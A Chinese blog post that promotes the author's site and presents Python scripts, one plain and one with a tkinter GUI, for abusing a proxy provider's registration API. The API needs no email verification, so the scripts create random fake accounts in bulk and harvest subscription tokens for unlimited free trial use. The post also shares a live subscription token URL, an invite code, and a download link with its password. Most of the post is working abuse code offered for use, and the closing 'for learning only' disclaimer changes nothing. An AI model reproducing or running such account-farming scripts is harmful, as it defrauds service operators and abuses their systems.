写了那么久的博客，终于有了属于自己的小窝，欢迎各位访问我的个人网站，未来我们一起交流进步。

ChatGPT国内镜像站https://gpt.huntersking.top

八方云已经跑路，但其他的如果有类似的bug也一样。

成品

失效
下载链接
https://wwhz.lanzout.com/iURYe0v2xs0f
密码:7bo8

漏洞分析

*方云注册时不需要邮箱验证码直接输入邮箱和密码即可注册

思路

1.抓取注册时的发包和返回结果

用浏览器自带的开发者工具（在浏览器按组合键Ctrl+Shift+I开启）

切换带网络（network）栏，清空数据

登录后复制的*方云订阅链接

http://sub.a335.sbs/api/v1/client/subscribe?token=f242c84a3a9d8653b60577e354a1d24e

我们只需要保存请求的url和负载就可以构建发包了，发包后只需要获取token就可以无限白嫖3h的八方云clash订阅了,速度极佳。

代码编写

1.随机生成邮箱

def generate_random_email():username_length = random.randint(8, 10)passwd_length = random.randint(8, 16)username = ''.join(random.choices(string.ascii_lowercase, k=username_length))passwd = ''.join(random.choices(string.ascii_letters + string.digits, k=passwd_length))return username+'@hwddoc.com', passwd

2.使用随机邮箱密码注册

def generate_link():url = 'http://bafangcn.vip/api/v1/passport/auth/register'headers = {'User-Agent': 'Mozilla/5.0',}email, passwd = generate_random_email()payload = {"email": f"{email}","password": f"{passwd}","invite_code": "RucRVhB8","email_code": ""}response = requests.post(url=url, headers=headers, data=payload)data = response.json()['data']token = data['token']

3.构造订阅链接（前缀+token）

link = f'http://www.1bbbaf.one/api/v1/client/subscribe?token={token}'

完整代码

import requests
import random
import string
import datetimedef generate_random_email():username_length = random.randint(8, 10)passwd_length = random.randint(8, 16)username = ''.join(random.choices(string.ascii_lowercase, k=username_length))passwd = ''.join(random.choices(string.ascii_letters + string.digits, k=passwd_length))return username+'@hello.com', passwdurl = 'http://bafangcn.vip/api/v1/passport/auth/register'headers = {'User-Agent': 'Mozilla/5.0',
}
email, passwd = generate_random_email()
payload = {"email": f"{email}","password": f"{passwd}","invite_code": "RucRVhB8","email_code": ""
}response = requests.post(url=url, headers=headers, data=payload)
data = response.json()['data']
token = data['token']
link = f'http://www.1bbbaf.one/api/v1/client/subscribe?token={token}'
print(link)

用tkinter封装图形后的代码

import tkinter as tk
import requests
import random
import stringdef generate_random_email():username_length = random.randint(8, 10)passwd_length = random.randint(8, 16)username = ''.join(random.choices(string.ascii_lowercase, k=username_length))passwd = ''.join(random.choices(string.ascii_letters + string.digits, k=passwd_length))return username+'@helloworld1.com', passwddef generate_link():url = 'http://bafangcn.vip/api/v1/passport/auth/register'headers = {'User-Agent': 'Mozilla/5.0',}email, passwd = generate_random_email()payload = {"email": f"{email}","password": f"{passwd}","invite_code": "RucRVhB8","email_code": ""}response = requests.post(url=url, headers=headers, data=payload)data = response.json()['data']token = data['token']link = f'http://www.1bbbaf.one/api/v1/client/subscribe?token={token}'# response = requests.post(url=url, headers=headers, data=payload)# data = response.json()['data']# token = data['token']# link = f'http://www.1bbbaf.one/api/v1/client/subscribe?token={token}'link_entry.delete(0, tk.END)link_entry.insert(0, link)root = tk.Tk()label = tk.Label(root, text="点击按钮生成订阅链接（每个三小时）")
label.pack()generate_button = tk.Button(root, text="生成订阅链接", command=generate_link)
generate_button.pack()link_entry = tk.Entry(root, width=80)
link_entry.pack()
root.title("猎人资源网（https://www.huntersking.top）")
root.mainloop()

以上内容仅用作学习交流，请勿用于任何违法途径，否则后果自负。